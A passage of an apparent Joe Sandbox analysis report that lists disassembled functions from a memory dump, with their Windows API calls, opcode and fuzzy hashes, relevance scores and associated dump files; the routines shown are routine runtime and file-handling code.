                                                                                              • Opcode ID: 258fa9f7134baa7b1dae2d76c37b7b49fd8f90f4e31621a043c4cb12a107cdd8
                                                                                              • Instruction ID: ca31820b05c929453e954263bbaa4f8433fb7fdfef4d0974970f2b73479813d8
                                                                                              • Opcode Fuzzy Hash: 258fa9f7134baa7b1dae2d76c37b7b49fd8f90f4e31621a043c4cb12a107cdd8
                                                                                              • Instruction Fuzzy Hash: 0601D4352042206AEF2BAB719C45BEEB25E9F0F784F050424F902EA081DB64DAC1C7B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033CA53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0033CA78
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 76fdf839c9c10d49842a79c92deecfdbf7f8d35d07b475253131d810a84b6ae6
                                                                                              • Instruction ID: 696ac8cda5b1bde5dd7da58699f474ac36eaace993ab4cbaa165eade30ba97c7
                                                                                              • Opcode Fuzzy Hash: 76fdf839c9c10d49842a79c92deecfdbf7f8d35d07b475253131d810a84b6ae6
                                                                                              • Instruction Fuzzy Hash: 984114B150428C9EDF238E68CCC5AFAFBBDEB45304F1408EDE58A96142D235AE45DF20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033C12C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 0033C19D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 7a65ce6df41e242974f5f5a0bf91f97efd78d51d88a80e65d651d69c85b480d9
                                                                                              • Instruction ID: 038399d144082c18ab1efe1e10c0ec531ad00022ce9598732f77c1d4865f78e0
                                                                                              • Opcode Fuzzy Hash: 7a65ce6df41e242974f5f5a0bf91f97efd78d51d88a80e65d651d69c85b480d9
                                                                                              • Instruction Fuzzy Hash: 4601D33654120DBBCF039F90DC01DEE7FA6EB08750F055515FE1829161CB729971AB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033C0CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0033B72F), ref: 0033C115
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 39c9f900a5c5e9aa03e22ab1a06d3ac756fed4fa659741809b4046fb3d25a906
                                                                                              • Instruction ID: 48cb42cd7a9c29b28e210c61f2b39ef75393811c3060c9088bb2803585767f24
                                                                                              • Opcode Fuzzy Hash: 39c9f900a5c5e9aa03e22ab1a06d3ac756fed4fa659741809b4046fb3d25a906
                                                                                              • Instruction Fuzzy Hash: 03F0B431A4121CBBCB079F54DC02D9E7FA5DB18750F004025FD092E161CF726910AB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033BF6F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 272fefb5999941fa3666f71f62d3d8a2d2618900bb767c62c1b05ba72840ca32
                                                                                              • Instruction ID: feeac8ecbc1f1cd1a99f7d2ce2f9f879b679594e73f75317e22c99b3d04c5841
                                                                                              • Opcode Fuzzy Hash: 272fefb5999941fa3666f71f62d3d8a2d2618900bb767c62c1b05ba72840ca32
                                                                                              • Instruction Fuzzy Hash: 81E0EC3164061C7BC6076B549C029BEBBD8CB49B10F010155FD056E250CF717D019AC9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032FD58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032FD6A
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3To
                                                                                              • API String ID: 1269201914-245939750
                                                                                              • Opcode ID: 395b4852727089ddb0f886cbc38508716ec9e1b7b9443bf4bbe2b1fb77338ead
                                                                                              • Instruction ID: 7f65d6a3e01b3b0f5637229647349275ce86086f4855ce6355eadf516b83271e
                                                                                              • Opcode Fuzzy Hash: 395b4852727089ddb0f886cbc38508716ec9e1b7b9443bf4bbe2b1fb77338ead
                                                                                              • Instruction Fuzzy Hash: 23B012B52685107D331B21103C13F36012CC4C0B12330C53BF001C844095841C840071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033CDB0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0033C97B: GetOEMCP.KERNEL32(00000000,?,?,0033CC04,?), ref: 0033C9A6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0033CC49,?,00000000), ref: 0033CE24
                                                                                              • GetCPInfo.KERNEL32(00000000,0033CC49,?,?,?,0033CC49,?,00000000), ref: 0033CE37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: ea8084a8e53392b49d5e5e1cc386c39d3a8fc02864ddcd5c00865955df8e12f9
                                                                                              • Instruction ID: 1667026f5002ced4cf6e1d09af0cf1483c0e046bce832241e75ed3c096825f01
                                                                                              • Opcode Fuzzy Hash: ea8084a8e53392b49d5e5e1cc386c39d3a8fc02864ddcd5c00865955df8e12f9
                                                                                              • Instruction Fuzzy Hash: 295154709243059FDB27CF31C8D16BBBBE9EF41300F15906EE096AB262D735A942CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,0031ACB0,?,?,00000000,?,?,00319C8B,?), ref: 0031AE3A
                                                                                              • GetLastError.KERNEL32(?,?,00319C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0031AE49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 0f3777aa29ff964151aae5b3c154a317b99927ba6bbc83ec6de9c83b5d2430b4
                                                                                              • Instruction ID: b2b2770a989356bc7c767af99fb1f22dccc38f7ac0988d61fd2d879410161445
                                                                                              • Opcode Fuzzy Hash: 0f3777aa29ff964151aae5b3c154a317b99927ba6bbc83ec6de9c83b5d2430b4
                                                                                              • Instruction Fuzzy Hash: 83412734205F458BD72EAE64E8946EA73A9FF4C313F11052AE84587E50DB71DCC48B63
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033CBE7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0033A515: GetLastError.KERNEL32(?,00353070,00335982,00353070,?,?,00335281,00000050,?,00353070,00000200), ref: 0033A519
                                                                                                • Part of subcall function 0033A515: _free.LIBCMT ref: 0033A54C
                                                                                                • Part of subcall function 0033A515: SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A58D
                                                                                                • Part of subcall function 0033A515: _abort.LIBCMT ref: 0033A593
                                                                                                • Part of subcall function 0033CD0E: _abort.LIBCMT ref: 0033CD40
                                                                                                • Part of subcall function 0033CD0E: _free.LIBCMT ref: 0033CD74
                                                                                                • Part of subcall function 0033C97B: GetOEMCP.KERNEL32(00000000,?,?,0033CC04,?), ref: 0033C9A6
                                                                                              • _free.LIBCMT ref: 0033CC5F
                                                                                              • _free.LIBCMT ref: 0033CC95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 7a4097d201ad9e39220ab496a393036efbe0ec3aac90bb24b6908fd175d409d1
                                                                                              • Instruction ID: fe47a2593c8d1e1abfb654cff985b8a709f98f57e8e4172ca27ea9ae3bf3647d
                                                                                              • Opcode Fuzzy Hash: 7a4097d201ad9e39220ab496a393036efbe0ec3aac90bb24b6908fd175d409d1
                                                                                              • Instruction Fuzzy Hash: 3A31D871904204AFDB16DF69D4C1B5DB7F5EF41320F251099F408AF2A1DB769D41DB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00317ED0,?,?,?,00000000), ref: 0031B04C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0031B100
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: 8f3e3d83e581bcfab83245e8e3f26912132f15ce80ad541e5d678e2b26b71b81
                                                                                              • Instruction ID: b6f5d4920523ff2ddb765170867bd69cdc471702fa7faf31783a8c15cd491b1b
                                                                                              • Opcode Fuzzy Hash: 8f3e3d83e581bcfab83245e8e3f26912132f15ce80ad541e5d678e2b26b71b81
                                                                                              • Instruction Fuzzy Hash: CC21F032248241ABC72ADE74C891AABFBE8AF5D304F05491CB4E1C7151D729E94C9B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0031B1B7,?,?,003181FD), ref: 0031A946
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0031B1B7,?,?,003181FD), ref: 0031A976
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 1277d521da878451fea27004502e6848b38ee8e2f867007433f26443dcbc2e96
                                                                                              • Instruction ID: 3f56bc1b6dbeaf5375c5cf589c43b7b1c46ebfd951be28013f4d433e8474807b
                                                                                              • Opcode Fuzzy Hash: 1277d521da878451fea27004502e6848b38ee8e2f867007433f26443dcbc2e96
                                                                                              • Instruction Fuzzy Hash: BB21D371504B486EE3718A65CC89BF776ECEB4D322F420A29F9D5C61C1C774A8C5C672
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00311F30 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00311F35
                                                                                                • Part of subcall function 003142F1: __EH_prolog.LIBCMT ref: 003142F6
                                                                                              • _wcslen.LIBCMT ref: 00311FDA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 5cef8e2ba561edc45e35c829315a2fe8cc800bf0528743c5f84ff892558aee08
                                                                                              • Instruction ID: 964c765a071c593b1b8ed47ed42d60b46efbf278600819734710398fdff4f5f6
                                                                                              • Opcode Fuzzy Hash: 5cef8e2ba561edc45e35c829315a2fe8cc800bf0528743c5f84ff892558aee08
                                                                                              • Instruction Fuzzy Hash: 2A218B32904218AFCF1AAF98DC919EEFBB6BF0C300F10052DF545AB6A1C7755992CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00334D02 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,003740C4,?,?,?,00334EF6,00000004,InitializeCriticalSectionEx,00347424,InitializeCriticalSectionEx,00000000,?,00334CAD,003740C4,00000FA0), ref: 00334D85
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00334D8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeLibraryProc
                                                                                              • String ID:
                                                                                              • API String ID: 3013587201-0
                                                                                              • Opcode ID: a4cff0e7f2eb8cacb69c8cb36f28034f0f42ca0f678b022f9223fda4d024b321
                                                                                              • Instruction ID: 0721d24eecbc1f94922afec474fd8008a3a4ab7308577bf8e38dfe4a9cf3cc11
                                                                                              • Opcode Fuzzy Hash: a4cff0e7f2eb8cacb69c8cb36f28034f0f42ca0f678b022f9223fda4d024b321
                                                                                              • Instruction Fuzzy Hash: 1C118E36600515AF8B23DFA4E8C09AA77A8FB46350F250169E905DB251EB30FD41CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0031B157
                                                                                              • GetLastError.KERNEL32 ref: 0031B164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: fdf806d8ea82a73910b588ab43508574e104101f3be742e30669492c5d160ea2
                                                                                              • Instruction ID: ed4d694defe38454e6240ca026078750a306e08b5f181058f1d842d74763919b
                                                                                              • Opcode Fuzzy Hash: fdf806d8ea82a73910b588ab43508574e104101f3be742e30669492c5d160ea2
                                                                                              • Instruction Fuzzy Hash: 5811CE31600700BBD72B8A28C855BE6F3E9AB09370F624638E553935D0E770AD85C660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BFB3 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0031D6A7: _wcslen.LIBCMT ref: 0031D6AF
                                                                                                • Part of subcall function 00323338: _wcslen.LIBCMT ref: 00323340
                                                                                                • Part of subcall function 00323338: _wcslen.LIBCMT ref: 00323351
                                                                                                • Part of subcall function 00323338: _wcslen.LIBCMT ref: 00323361
                                                                                                • Part of subcall function 00323338: _wcslen.LIBCMT ref: 0032336F
                                                                                                • Part of subcall function 00323338: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0031C844,?,?,00000000,?,?,?), ref: 0032338A
                                                                                                • Part of subcall function 0032BC19: SetCurrentDirectoryW.KERNELBASE(?,0032BFF6,00361890,00000000,00362892,00000006), ref: 0032BC1D
                                                                                              • _wcslen.LIBCMT ref: 0032C00F
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00362892,00000006), ref: 0032C048
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                                                              • String ID:
                                                                                              • API String ID: 1016385243-0
                                                                                              • Opcode ID: 7982c693b4f60c546587196a2bfedf3949d07e5d5ea104631b8ef1562079b290
